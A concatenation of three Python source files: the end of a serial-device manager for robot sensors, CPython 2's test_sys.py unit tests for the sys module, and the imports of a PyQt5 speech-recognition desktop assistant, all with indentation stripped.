existing_devices.values()))
sensors = identify_smart_sensors(ports)
for (ser, uid) in sensors.items():
idx = names.index(ser)
port = ports[idx]
pack = spin_up_device(port, uid, state_queue, batched_data, error_queue)
existing_devices[uid] = pack
# Tell the device to start sending data
pack.write_queue.put(("ping", []))
pack.write_queue.put(("subscribe", [1, 0, []]))
def clean_up_devices(device_queue):
"""
Clean up associated resources of devices in the queue.
Closing a serial port can take a very long time (30 seconds or more).
It's best to spin this function off into its own thread,
so that you're not blocked on reclaiming resources.
"""
while True:
device = device_queue.get()
device.serial_port.close()
device.read_thread.join()
device.write_thread.join()
def remove_disconnected_devices(error_queue, devices, clean_up_queue, state_queue):
"""
Clean up any disconnected devices in ERROR_QUEUE.
"""
next_time_errors = []
while True:
try:
error = error_queue.get(block=False)
pack = devices[error.uid]
if not error.accessed:
# Wait until the next cycle to make sure it's disconnected
error.accessed = True
next_time_errors.append(error)
continue
elif error.instance_id != pack.instance_id:
# The device has reconnected in the meantime
continue
uid = error.uid
pack = devices[uid]
del devices[uid]
clean_up_queue.put(pack)
state_queue.put(("device_disconnected", [uid]))
except queue.Empty:
for err in next_time_errors:
error_queue.put(err)
return
# pylint: disable=too-many-branches, too-many-locals
# pylint: disable=too-many-arguments, unused-argument
def hibike_process(bad_things_queue, state_queue, pipe_from_child):
"""
Run the main hibike processs.
"""
serials, serial_names = get_working_serial_ports()
smart_sensors = identify_smart_sensors(serials)
devices = {}
batched_data = {}
error_queue = queue.Queue()
for (ser, uid) in smart_sensors.items():
index = serial_names.index(ser)
serial_port = serials[index]
pack = spin_up_device(serial_port, uid, state_queue, batched_data, error_queue)
devices[uid] = pack
batch_thread = threading.Thread(target=batch_data, args=(batched_data, state_queue))
batch_thread.start()
hotplug_thread = threading.Thread(target=hotplug,
args=(devices, state_queue, batched_data, error_queue))
hotplug_thread.start()
# Pings all devices and tells them to stop sending data
for pack in devices.values():
pack.write_queue.put(("ping", []))
pack.write_queue.put(("subscribe", [1, 0, []]))
# the main thread reads instructions from statemanager and
# forwards them to the appropriate device write threads
path = os.path.dirname(os.path.abspath(__file__))
parent_path = path.rstrip("hibike")
runtime = os.path.join(parent_path, "runtime")
sys.path.insert(1, runtime)
import runtimeUtil
while True:
instruction, args = pipe_from_child.recv()
try:
if instruction == "enumerate_all":
for pack in devices.values():
pack.write_queue.put(("ping", []))
elif instruction == "subscribe_device":
uid = args[0]
if uid in devices:
devices[uid].write_queue.put(("subscribe", args))
elif instruction == "write_params":
uid = args[0]
if uid in devices:
devices[uid].write_queue.put(("write", args))
elif instruction == "read_params":
uid = args[0]
if uid in devices:
devices[uid].write_queue.put(("read", args))
elif instruction == "disable_all":
for pack in devices.values():
pack.write_queue.put(("disable", []))
elif instruction == "timestamp_down":
timestamp = time.perf_counter()
args.append(timestamp)
state_queue.put(("timestamp_up", args))
except KeyError as e:
bad_things_queue.put(runtimeUtil.BadThing(
sys.exc_info(),
str(e),
event=runtimeUtil.BAD_EVENTS.HIBIKE_NONEXISTENT_DEVICE))
except TypeError as e:
bad_things_queue.put(runtimeUtil.BadThing(
sys.exc_info(),
str(e),
event=runtimeUtil.BAD_EVENTS.HIBIKE_INSTRUCTION_ERROR))
def device_write_thread(ser, instr_queue):
"""
Send packets to SER based on instructions from INSTR_QUEUE.
"""
try:
while True:
instruction, args = instr_queue.get()
if instruction == "ping":
hm.send(ser, hm.make_ping())
elif instruction == "subscribe":
uid, delay, params = args
hm.send(ser, hm.make_subscription_request(hm.uid_to_device_id(uid), params, delay))
elif instruction == "read":
uid, params = args
hm.send(ser, hm.make_device_read(hm.uid_to_device_id(uid), params))
elif instruction == "write":
uid, params_and_values = args
hm.send(ser, hm.make_device_write(hm.uid_to_device_id(uid), params_and_values))
elif instruction == "disable":
hm.send(ser, hm.make_disable())
elif instruction == "heartResp":
uid = args[0]
hm.send(ser, hm.make_heartbeat_response())
except serial.SerialException:
# Device has disconnected
pass
def device_read_thread(uid, pack, error_queue, state_queue, batched_data):
"""
Read packets from SER and update queues and BATCHED_DATA accordingly.
"""
ser = pack.serial_port
instruction_queue = pack.write_queue
try:
while True:
for packet in hm.blocking_read_generator(ser):
message_type = packet.get_message_id()
if message_type == hm.MESSAGE_TYPES["SubscriptionResponse"]:
params, delay, uid = hm.parse_subscription_response(packet)
state_queue.put(("device_subscribed", [uid, delay, params]))
elif message_type == hm.MESSAGE_TYPES["DeviceData"]:
params_and_values = hm.parse_device_data(packet, hm.uid_to_device_id(uid))
batched_data[uid] = params_and_values
elif message_type == hm.MESSAGE_TYPES["HeartBeatRequest"]:
instruction_queue.put(("heartResp", [uid]))
except serial.SerialException:
error = namedtuple("Disconnect", ["uid", "instance_id", "accessed"])
error.uid = uid
error.instance_id = pack.instance_id
error.accessed = False
error_queue.put(error)
def batch_data(data, state_queue):
"""
Write out DATA to STATE_QUEUE periodically.
"""
while True:
time.sleep(BATCH_SLEEP_TIME)
state_queue.put(("device_values", [data]))
#############
## TESTING ##
#############
# pylint: disable=invalid-name
if __name__ == "__main__":
# helper functions so we can spawn threads that try to read/write to hibike_devices periodically
def set_interval_sequence(functions, sec):
"""
Create a thread that executes FUNCTIONS after SEC seconds.
"""
def func_wrapper():
"""
Execute the next function in FUNCTIONS after SEC seconds.
Cycles through all functions.
"""
set_interval_sequence(functions[1:] + functions[:1], sec)
functions[0]()
t = threading.Timer(sec, func_wrapper)
t.start()
return t
def make_send_write(pipe_to_child, uid, params_and_values):
"""
Create a function that sends UID and PARAMS_AND_VALUES
to PIPE_TO_CHILD.
"""
def helper():
"""
Helper function.
"""
pipe_to_child.send(["write_params", [uid, params_and_values]])
return helper
to_child, from_child = multiprocessing.Pipe()
main_error_queue = multiprocessing.Queue()
main_state_queue = multiprocessing.Queue()
newProcess = multiprocessing.Process(target=hibike_process,
name="hibike_sim",
args=[main_error_queue, main_state_queue, from_child])
newProcess.daemon = True
newProcess.start()
to_child.send(["enumerate_all", []])
uids = set()
while True:
print("waiting for command")
command, main_args = main_state_queue.get()
if command == "device_subscribed":
dev_uid = main_args[0]
if dev_uid not in uids:
uids.add(dev_uid)
if hm.DEVICES[hm.uid_to_device_id(dev_uid)]["name"] == "YogiBear":
set_interval_sequence([
make_send_write(to_child, dev_uid, [("duty_cycle", 0)]),
make_send_write(to_child, dev_uid, [("duty_cycle", 0.5)]),
make_send_write(to_child, dev_uid, [("duty_cycle", 1.0)]),
make_send_write(to_child, dev_uid, [("duty_cycle", 0)]),
make_send_write(to_child, dev_uid, [("duty_cycle", -0.5)]),
make_send_write(to_child, dev_uid, [("duty_cycle", -1.0)]),
make_send_write(to_child, dev_uid, [("duty_cycle", 0)])
], 0.75)
elif hm.DEVICES[hm.uid_to_device_id(dev_uid)]["name"] == "ServoControl":
set_interval_sequence([
make_send_write(to_child, dev_uid,
[("servo0", 1), ("enable0", False),
("servo1", 21), ("enable1", True),
("servo2", 30), ("enable2", True),
("servo3", 8), ("enable3", True)]),
make_send_write(to_child, dev_uid,
[("servo0", 5), ("enable0", False),
("servo1", 5), ("enable1", True),
("servo2", 5), ("enable2", True),
("servo3", 5), ("enable3", False)]),
make_send_write(to_child, dev_uid,
[("servo0", 1), ("enable0", True),
("servo1", 26), ("enable1", True),
("servo2", 30), ("enable2", False),
("servo3", 17), ("enable3", True)]),
make_send_write(to_child, dev_uid,
[("servo0", 13), ("enable0", False),
("servo1", 7), ("enable1", False),
("servo2", 24), ("enable2", True),
("servo3", 10), ("enable3", True)]),
make_send_write(to_child, dev_uid,
[("servo0", 27), ("enable0", True),
("servo1", 2), ("enable1", False),
("servo2", 3), ("enable2", False),
("servo3", 14), ("enable3", False)]),
make_send_write(to_child, dev_uid,
[("servo0", 20), ("enable0", True),
("servo1", 12), ("enable1", False),
("servo2", 20), ("enable2", False),
("servo3", 29), ("enable3", True)]),
], 1)
parameters = []
for param in hm.DEVICES[hm.uid_to_device_id(dev_uid)]["params"]:
parameters.append(param["name"])
to_child.send(["subscribe_device", [dev_uid, 10, parameters]])
elif command == "device_values":
print("%10.2f, %s" % (time.time(), str(main_args)))
|
test_sys.py
|
# expected: fail
# -*- coding: iso-8859-1 -*-
import unittest, test.test_support
from test.script_helper import assert_python_ok, assert_python_failure
import sys, os, cStringIO
import struct
import operator
class SysModuleTest(unittest.TestCase):
def tearDown(self):
test.test_support.reap_children()
def test_original_displayhook(self):
import __builtin__
savestdout = sys.stdout
out = cStringIO.StringIO()
sys.stdout = out
dh = sys.__displayhook__
self.assertRaises(TypeError, dh)
if hasattr(__builtin__, "_"):
del __builtin__._
dh(None)
self.assertEqual(out.getvalue(), "")
self.assertTrue(not hasattr(__builtin__, "_"))
dh(42)
self.assertEqual(out.getvalue(), "42\n")
self.assertEqual(__builtin__._, 42)
del sys.stdout
self.assertRaises(RuntimeError, dh, 42)
sys.stdout = savestdout
def test_lost_displayhook(self):
olddisplayhook = sys.displayhook
del sys.displayhook
code = compile("42", "<string>", "single")
self.assertRaises(RuntimeError, eval, code)
sys.displayhook = olddisplayhook
def test_custom_displayhook(self):
olddisplayhook = sys.displayhook
def baddisplayhook(obj):
raise ValueError
sys.displayhook = baddisplayhook
code = compile("42", "<string>", "single")
self.assertRaises(ValueError, eval, code)
sys.displayhook = olddisplayhook
def test_original_excepthook(self):
savestderr = sys.stderr
err = cStringIO.StringIO()
sys.stderr = err
eh = sys.__excepthook__
self.assertRaises(TypeError, eh)
try:
raise ValueError(42)
except ValueError, exc:
eh(*sys.exc_info())
sys.stderr = savestderr
self.assertTrue(err.getvalue().endswith("ValueError: 42\n"))
# FIXME: testing the code for a lost or replaced excepthook in
# Python/pythonrun.c::PyErr_PrintEx() is tricky.
def test_exc_clear(self):
self.assertRaises(TypeError, sys.exc_clear, 42)
# Verify that exc_info is present and matches exc, then clear it, and
# check that it worked.
def clear_check(exc):
typ, value, traceback = sys.exc_info()
self.assertTrue(typ is not None)
self.assertTrue(value is exc)
self.assertTrue(traceback is not None)
with test.test_support.check_py3k_warnings():
sys.exc_clear()
typ, value, traceback = sys.exc_info()
self.assertTrue(typ is None)
self.assertTrue(value is None)
self.assertTrue(traceback is None)
def clear():
try:
raise ValueError, 42
except ValueError, exc:
clear_check(exc)
# Raise an exception and check that it can be cleared
clear()
# Verify that a frame currently handling an exception is
# unaffected by calling exc_clear in a nested frame.
try:
raise ValueError, 13
except ValueError, exc:
typ1, value1, traceback1 = sys.exc_info()
clear()
typ2, value2, traceback2 = sys.exc_info()
self.assertTrue(typ1 is typ2)
self.assertTrue(value1 is exc)
self.assertTrue(value1 is value2)
self.assertTrue(traceback1 is traceback2)
# Check that an exception can be cleared outside of an except block
clear_check(exc)
def test_exit(self):
# call with two arguments
self.assertRaises(TypeError, sys.exit, 42, 42)
# call without argument
with self.assertRaises(SystemExit) as cm:
sys.exit()
self.assertIsNone(cm.exception.code)
rc, out, err = assert_python_ok('-c', 'import sys; sys.exit()')
self.assertEqual(rc, 0)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
# call with integer argument
with self.assertRaises(SystemExit) as cm:
sys.exit(42)
self.assertEqual(cm.exception.code, 42)
# call with tuple argument with one entry
# entry will be unpacked
with self.assertRaises(SystemExit) as cm:
sys.exit((42,))
self.assertEqual(cm.exception.code, 42)
# call with string argument
with self.assertRaises(SystemExit) as cm:
sys.exit("exit")
self.assertEqual(cm.exception.code, "exit")
# call with tuple argument with two entries
with self.assertRaises(SystemExit) as cm:
sys.exit((17, 23))
self.assertEqual(cm.exception.code, (17, 23))
# test that the exit machinery handles SystemExits properly
# both unnormalized...
rc, out, err = assert_python_failure('-c', 'raise SystemExit, 46')
self.assertEqual(rc, 46)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
# ... and normalized
rc, out, err = assert_python_failure('-c', 'raise SystemExit(47)')
self.assertEqual(rc, 47)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
def check_exit_message(code, expected, **env_vars):
rc, out, err = assert_python_failure('-c', code, **env_vars)
self.assertEqual(rc, 1)
self.assertEqual(out, b'')
self.assertTrue(err.startswith(expected),
"%s doesn't start with %s" % (repr(err), repr(expected)))
# test that stderr buffer is flushed before the exit message is written
# into stderr
check_exit_message(
r'import sys; sys.stderr.write("unflushed,"); sys.exit("message")',
b"unflushed,message")
# test that the unicode message is encoded to the stderr encoding
check_exit_message(
r'import sys; sys.exit(u"h\xe9")',
b"h\xe9", PYTHONIOENCODING='latin-1')
def test_getdefaultencoding(self):
if test.test_support.have_unicode:
self.assertRaises(TypeError, sys.getdefaultencoding, 42)
# can't check more than the type, as the user might have changed it
self.assertIsInstance(sys.getdefaultencoding(), str)
# testing sys.settrace() is done in test_sys_settrace.py
# testing sys.setprofile() is done in test_sys_setprofile.py
def test_setcheckinterval(self):
self.assertRaises(TypeError, sys.setcheckinterval)
orig = sys.getcheckinterval()
for n in 0, 100, 120, orig: # orig last to restore starting state
sys.setcheckinterval(n)
self.assertEqual(sys.getcheckinterval(), n)
def test_recursionlimit(self):
self.assertRaises(TypeError, sys.getrecursionlimit, 42)
oldlimit = sys.getrecursionlimit()
self.assertRaises(TypeError, sys.setrecursionlimit)
self.assertRaises(ValueError, sys.setrecursionlimit, -42)
sys.setrecursionlimit(10000)
self.assertEqual(sys.getrecursionlimit(), 10000)
sys.setrecursionlimit(oldlimit)
self.assertRaises(OverflowError, sys.setrecursionlimit, 1 << 31)
try:
sys.setrecursionlimit((1 << 31) - 5)
try:
# issue13546: isinstance(e, ValueError) used to fail
# when the recursion limit is close to 1<<31
raise ValueError()
except ValueError, e:
pass
finally:
sys.setrecursionlimit(oldlimit)
def test_getwindowsversion(self):
# Raise SkipTest if sys doesn't have getwindowsversion attribute
test.test_support.get_attribute(sys, "getwindowsversion")
v = sys.getwindowsversion()
self.assertEqual(len(v), 5)
self.assertIsInstance(v[0], int)
self.assertIsInstance(v[1], int)
self.assertIsInstance(v[2], int)
self.assertIsInstance(v[3], int)
self.assertIsInstance(v[4], str)
self.assertRaises(IndexError, operator.getitem, v, 5)
self.assertIsInstance(v.major, int)
self.assertIsInstance(v.minor, int)
self.assertIsInstance(v.build, int)
self.assertIsInstance(v.platform, int)
self.assertIsInstance(v.service_pack, str)
self.assertIsInstance(v.service_pack_minor, int)
self.assertIsInstance(v.service_pack_major, int)
self.assertIsInstance(v.suite_mask, int)
self.assertIsInstance(v.product_type, int)
self.assertEqual(v[0], v.major)
self.assertEqual(v[1], v.minor)
self.assertEqual(v[2], v.build)
self.assertEqual(v[3], v.platform)
self.assertEqual(v[4], v.service_pack)
# This is how platform.py calls it. Make sure tuple
# still has 5 elements
maj, min, buildno, plat, csd = sys.getwindowsversion()
@unittest.skipUnless(hasattr(sys, "setdlopenflags"),
'test needs sys.setdlopenflags()')
def test_dlopenflags(self):
self.assertTrue(hasattr(sys, "getdlopenflags"))
self.assertRaises(TypeError, sys.getdlopenflags, 42)
oldflags = sys.getdlopenflags()
self.assertRaises(TypeError, sys.setdlopenflags)
sys.setdlopenflags(oldflags+1)
self.assertEqual(sys.getdlopenflags(), oldflags+1)
sys.setdlopenflags(oldflags)
def test_refcount(self):
# n here must be a global in order for this test to pass while
# tracing with a python function. Tracing calls PyFrame_FastToLocals
# which will add a copy of any locals to the frame object, causing
# the reference count to increase by 2 instead of 1.
global n
self.assertRaises(TypeError, sys.getrefcount)
c = sys.getrefcount(None)
n = None
self.assertEqual(sys.getrefcount(None), c+1)
del n
self.assertEqual(sys.getrefcount(None), c)
if hasattr(sys, "gettotalrefcount"):
self.assertIsInstance(sys.gettotalrefcount(), int)
def test_getframe(self):
self.assertRaises(TypeError, sys._getframe, 42, 42)
self.assertRaises(ValueError, sys._getframe, 2000000000)
self.assertTrue(
SysModuleTest.test_getframe.im_func.func_code \
is sys._getframe().f_code
)
# sys._current_frames() is a CPython-only gimmick.
def test_current_frames(self):
have_threads = True
try:
import thread
except ImportError:
have_threads = False
if have_threads:
self.current_frames_with_threads()
else:
self.current_frames_without_threads()
# Test sys._current_frames() in a WITH_THREADS build.
@test.test_support.reap_threads
def current_frames_with_threads(self):
import threading, thread
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_frames(), and verifies that the frames
# returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(thread.get_ident())
entered_g.set()
leave_g.wait()
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved on
# to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_frames()
main_id = thread.get_ident()
self.assertIn(main_id, d)
self.assertIn(thread_id, d)
# Verify that the captured main-thread frame is _this_ frame.
frame = d.pop(main_id)
self.assertTrue(frame is sys._getframe())
# Verify that the captured thread frame is blocked in g456, called
# from f123. This is a litte tricky, since various bits of
# threading.py are also in the thread's call stack.
frame = d.pop(thread_id)
stack = traceback.extract_stack(frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assertIn(sourceline, ["leave_g.wait()", "entered_g.set()"])
# Reap the spawned thread.
leave_g.set()
t.join()
# Test sys._current_frames() when thread support doesn't exist.
def current_frames_without_threads(self):
# Not much happens here: there is only one thread, with artificial
# "thread id" 0.
d = sys._current_frames()
self.assertEqual(len(d), 1)
self.assertIn(0, d)
self.assertTrue(d[0] is sys._getframe())
def test_attributes(self):
self.assertIsInstance(sys.api_version, int)
self.assertIsInstance(sys.argv, list)
self.assertIn(sys.byteorder, ("little", "big"))
self.assertIsInstance(sys.builtin_module_names, tuple)
self.assertIsInstance(sys.copyright, basestring)
self.assertIsInstance(sys.exec_prefix, basestring)
self.assertIsInstance(sys.executable, basestring)
self.assertEqual(len(sys.float_info), 11)
self.assertEqual(sys.float_info.radix, 2)
self.assertEqual(len(sys.long_info), 2)
self.assertTrue(sys.long_info.bits_per_digit % 5 == 0)
self.assertTrue(sys.long_info.sizeof_digit >= 1)
self.assertEqual(type(sys.long_info.bits_per_digit), int)
self.assertEqual(type(sys.long_info.sizeof_digit), int)
self.assertIsInstance(sys.hexversion, int)
self.assertIsInstance(sys.maxint, int)
if test.test_support.have_unicode:
self.assertIsInstance(sys.maxunicode, int)
self.assertIsInstance(sys.platform, basestring)
self.assertIsInstance(sys.prefix, basestring)
self.assertIsInstance(sys.version, basestring)
vi = sys.version_info
self.assertIsInstance(vi[:], tuple)
self.assertEqual(len(vi), 5)
self.assertIsInstance(vi[0], int)
self.assertIsInstance(vi[1], int)
self.assertIsInstance(vi[2], int)
self.assertIn(vi[3], ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi[4], int)
self.assertIsInstance(vi.major, int)
self.assertIsInstance(vi.minor, int)
self.assertIsInstance(vi.micro, int)
self.assertIn(vi.releaselevel, ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi.serial, int)
self.assertEqual(vi[0], vi.major)
self.assertEqual(vi[1], vi.minor)
self.assertEqual(vi[2], vi.micro)
self.assertEqual(vi[3], vi.releaselevel)
self.assertEqual(vi[4], vi.serial)
self.assertTrue(vi > (1,0,0))
self.assertIsInstance(sys.float_repr_style, str)
self.assertIn(sys.float_repr_style, ('short', 'legacy'))
def test_43581(self):
# Can't use sys.stdout, as this is a cStringIO object when
# the test runs under regrtest.
self.assertTrue(sys.__stdout__.encoding == sys.__stderr__.encoding)
def test_sys_flags(self):
self.assertTrue(sys.flags)
attrs = ("debug", "py3k_warning", "division_warning", "division_new",
"inspect", "interactive", "optimize", "dont_write_bytecode",
"no_site", "ignore_environment", "tabcheck", "verbose",
"unicode", "bytes_warning", "hash_randomization")
for attr in attrs:
self.assertTrue(hasattr(sys.flags, attr), attr)
self.assertEqual(type(getattr(sys.flags, attr)), int, attr)
self.assertTrue(repr(sys.flags))
def test_clear_type_cache(self):
sys._clear_type_cache()
def test_ioencoding(self):
import subprocess
env = dict(os.environ)
# Test character: cent sign, encoded as 0x4A (ASCII J) in CP424,
# not representable in ASCII.
env["PYTHONIOENCODING"] = "cp424"
p = subprocess.Popen([sys.executable, "-c", 'print unichr(0xa2)'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, unichr(0xa2).encode("cp424"))
env["PYTHONIOENCODING"] = "ascii:replace"
p = subprocess.Popen([sys.executable, "-c", 'print unichr(0xa2)'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, '?')
def test_call_tracing(self):
self.assertEqual(sys.call_tracing(str, (2,)), "2")
self.assertRaises(TypeError, sys.call_tracing, str, 2)
def test_executable(self):
# sys.executable should be absolute
self.assertEqual(os.path.abspath(sys.executable), sys.executable)
# Issue #7774: Ensure that sys.executable is an empty string if argv[0]
# has been set to an non existent program name and Python is unable to
# retrieve the real program name
import subprocess
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
python_dir = os.path.dirname(os.path.realpath(sys.executable))
p = subprocess.Popen(
["nonexistent", "-c", 'import sys; print repr(sys.executable)'],
executable=sys.executable, stdout=subprocess.PIPE, cwd=python_dir)
executable = p.communicate()[0].strip()
p.wait()
self.assertIn(executable, ["''", repr(sys.executable)])
@test.test_support.cpython_only
class SizeofTest(unittest.TestCase):
def setUp(self):
self.P = struct.calcsize('P')
self.longdigit = sys.long_info.sizeof_digit
import _testcapi
self.gc_headsize = _testcapi.SIZEOF_PYGC_HEAD
self.file = open(test.test_support.TESTFN, 'wb')
def tearDown(self):
self.file.close()
test.test_support.unlink(test.test_support.TESTFN)
check_sizeof = test.test_support.check_sizeof
def test_gc_head_size(self):
# Check that the gc header size is added to objects tracked by the gc.
size = test.test_support.calcobjsize
gc_header_size = self.gc_headsize
# bool objects are not gc tracked
self.assertEqual(sys.getsizeof(True), size('l'))
# but lists are
self.assertEqual(sys.getsizeof([]), size('P PP') + gc_header_size)
def test_default(self):
size = test.test_support.calcobjsize
self.assertEqual(sys.getsizeof(True, -1), size('l'))
def test_objecttypes(self):
# check all types defined in Objects/
size = test.test_support.calcobjsize
vsize = test.test_support.calcvobjsize
check = self.check_sizeof
# bool
check(True, size('l'))
# buffer
with test.test_support.check_py3k_warnings():
check(buffer(''), size('2P2Pil'))
# builtin_function_or_method
check(len, size('3P'))
# bytearray
samples = ['', 'u'*100000]
for sample in samples:
x = bytearray(sample)
check(x, vsize('iPP') + x.__alloc__())
# bytearray_iterator
check(iter(bytearray()), size('PP'))
# cell
def get_cell():
x = 42
def inner():
return x
return inner
check(get_cell().func_closure[0], size('P'))
# classobj (old-style class)
class class_oldstyle():
def method():
pass
check(class_oldstyle, size('7P'))
# instance (old-style class)
check(class_oldstyle(), size('3P'))
# instancemethod (old-style class)
check(class_oldstyle().method, size('4P'))
# complex
check(complex(0,1), size('2d'))
# code
check(get_cell().func_code, size('4i8Pi3P'))
# BaseException
check(BaseException(), size('3P'))
# UnicodeEncodeError
check(UnicodeEncodeError("", u"", 0, 0, ""), size('5P2PP'))
# UnicodeDecodeError
check(UnicodeDecodeError("", "", 0, 0, ""), size('5P2PP'))
# UnicodeTranslateError
check(UnicodeTranslateError(u"", 0, 1, ""), size('5P2PP'))
# method_descriptor (descriptor object)
check(str.lower, size('2PP'))
# classmethod_descriptor (descriptor object)
# XXX
# member_descriptor (descriptor object)
import datetime
check(datetime.timedelta.days, size('2PP'))
# getset_descriptor (descriptor object)
import __builtin__
check(__builtin__.file.closed, size('2PP'))
# wrapper_descriptor (descriptor object)
check(int.__add__, size('2P2P'))
# dictproxy
class C(object): pass
check(C.__dict__, size('P'))
# method-wrapper (descriptor object)
check({}.__iter__, size('2P'))
# dict
check({}, size('3P2P' + 8*'P2P'))
x = {1:1, 2:2, 3:3, 4:4, 5:5, 6:6, 7:7, 8:8}
check(x, size('3P2P' + 8*'P2P') + 16*struct.calcsize('P2P'))
# dictionary-keyiterator
check({}.iterkeys(), size('P2PPP'))
# dictionary-valueiterator
check({}.itervalues(), size('P2PPP'))
# dictionary-itemiterator
check({}.iteritems(), size('P2PPP'))
# ellipses
check(Ellipsis, size(''))
# EncodingMap
import codecs, encodings.iso8859_3
x = codecs.charmap_build(encodings.iso8859_3.decoding_table)
check(x, size('32B2iB'))
# enumerate
check(enumerate([]), size('l3P'))
# file
check(self.file, size('4P2i4P3i3P3i'))
# float
check(float(0), size('d'))
# sys.floatinfo
check(sys.float_info, vsize('') + self.P * len(sys.float_info))
# frame
import inspect
CO_MAXBLOCKS = 20
x = inspect.currentframe()
ncells = len(x.f_code.co_cellvars)
nfrees = len(x.f_code.co_freevars)
extras = x.f_code.co_stacksize + x.f_code.co_nlocals +\
ncells + nfrees - 1
check(x, vsize('12P3i' + CO_MAXBLOCKS*'3i' + 'P' + extras*'P'))
# function
def func(): pass
check(func, size('9P'))
class c():
@staticmethod
def foo():
pass
@classmethod
def bar(cls):
pass
# staticmethod
check(foo, size('P'))
# classmethod
check(bar, size('P'))
# generator
def get_gen(): yield 1
check(get_gen(), size('Pi2P'))
# integer
check(1, size('l'))
check(100, size('l'))
# iterator
check(iter('abc'), size('lP'))
# callable-iterator
import re
check(re.finditer('',''), size('2P'))
# list
samples = [[], [1,2,3], ['1', '2', '3']]
for sample in samples:
check(sample, vsize('PP') + len(sample)*self.P)
# sortwrapper (list)
# XXX
# cmpwrapper (list)
# XXX
# listiterator (list)
check(iter([]), size('lP'))
# listreverseiterator (list)
check(reversed([]), size('lP'))
# long
check(0L, vsize(''))
check(1L, vsize('') + self.longdigit)
check(-1L, vsize('') + self.longdigit)
PyLong_BASE = 2**sys.long_info.bits_per_digit
check(long(PyLong_BASE), vsize('') + 2*self.longdigit)
check(long(PyLong_BASE**2-1), vsize('') + 2*self.longdigit)
check(long(PyLong_BASE**2), vsize('') + 3*self.longdigit)
# module
check(unittest, size('P'))
# None
check(None, size(''))
# object
check(object(), size(''))
# property (descriptor object)
class C(object):
def getx(self): return self.__x
def setx(self, value): self.__x = value
def delx(self): del self.__x
x = property(getx, setx, delx, "")
check(x, size('4Pi'))
# PyCObject
# PyCapsule
# XXX
# rangeiterator
check(iter(xrange(1)), size('4l'))
# reverse
check(reversed(''), size('PP'))
# set
# frozenset
PySet_MINSIZE = 8
samples = [[], range(10), range(50)]
s = size('3P2P' + PySet_MINSIZE*'lP' + 'lP')
for sample in samples:
minused = len(sample)
if minused == 0: tmp = 1
# the computation of minused is actually a bit more complicated
# but this suffices for the sizeof test
minused = minused*2
newsize = PySet_MINSIZE
while newsize <= minused:
newsize = newsize << 1
if newsize <= 8:
check(set(sample), s)
check(frozenset(sample), s)
else:
check(set(sample), s + newsize*struct.calcsize('lP'))
check(frozenset(sample), s + newsize*struct.calcsize('lP'))
# setiterator
check(iter(set()), size('P3P'))
# slice
check(slice(1), size('3P'))
# str
vh = test.test_support._vheader
check('', struct.calcsize(vh + 'lic'))
check('abc', struct.calcsize(vh + 'lic') + 3)
# super
check(super(int), size('3P'))
# tuple
check((), vsize(''))
check((1,2,3), vsize('') + 3*self.P)
# tupleiterator
check(iter(()), size('lP'))
# type
# (PyTypeObject + PyNumberMethods + PyMappingMethods +
# PySequenceMethods + PyBufferProcs)
s = vsize('P2P15Pl4PP9PP11PI') + struct.calcsize('41P 10P 3P 6P')
class newstyleclass(object):
pass
check(newstyleclass, s)
# builtin type
check(int, s)
# NotImplementedType
import types
check(types.NotImplementedType, s)
# unicode
usize = len(u'\0'.encode('unicode-internal'))
samples = [u'', u'1'*100]
# we need to test for both sizes, because we don't know if the string
# has been cached
for s in samples:
check(s, size('PPlP') + usize * (len(s) + 1))
# weakref
import weakref
check(weakref.ref(int), size('2Pl2P'))
# weakproxy
# XXX
# weakcallableproxy
check(weakref.proxy(int), size('2Pl2P'))
# xrange
check(xrange(1), size('3l'))
check(xrange(66000), size('3l'))
def test_pythontypes(self):
# check all types defined in Python/
size = test.test_support.calcobjsize
vsize = test.test_support.calcvobjsize
check = self.check_sizeof
# _ast.AST
import _ast
check(_ast.AST(), size(''))
# imp.NullImporter
import imp
check(imp.NullImporter(self.file.name), size(''))
try:
raise TypeError
except TypeError:
tb = sys.exc_info()[2]
# traceback
if tb != None:
check(tb, size('2P2i'))
# symtable entry
# XXX
# sys.flags
check(sys.flags, vsize('') + self.P * len(sys.flags))
def test_main():
test_classes = (SysModuleTest, SizeofTest)
test.test_support.run_unittest(*test_classes)
if __name__ == "__main__":
test_main()
|
app.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
""" This file contains the GUI for the SimpleDigitalAssistant application.
This application is made specifically for Windows OS, and can be used
to accomplish small tasks via automatic speech recognition (using pre-trained
models)."""
__author__ = ["Hannan Khan", "Salman Nazir", "Reza Mohideen", "Ali Abdul-Hameed"]
__copyright__ = "Copyright 2022, SimpleDigitalAssistant"
__credits__ = ["Hannan Khan", "Salman Nazir", "Reza Mohideen", "Ali Abdul-Hameed"]
__license__ = "MIT"
__version__ = "1.0"
__maintainer__ = "Hannan Khan"
__email__ = "hannankhan888@gmail.com"
import os.path
import sys
import threading
import time
import json
import numpy as np
import pyaudio
import sounddevice as sd
from PyQt5 import QtWidgets, QtGui, QtTextToSpeech
from PyQt5.QtCore import Qt
from PyQt5.QtGui import QFont, QFontDatabase, QCursor, QPixmap
from PyQt5.QtWidgets import QHBoxLayout, QLabel, QVBoxLayout
from PyQt5.QtWidgets import QMainWindow, QApplication, QDesktopWidget, QFrame, QSplashScreen
from Actions.actions import Action
from VoiceRecognition.Wav2vecLive.inference import Wave2Vec2Inference
from utils.dynamicPyQt5Labels import CustomButton
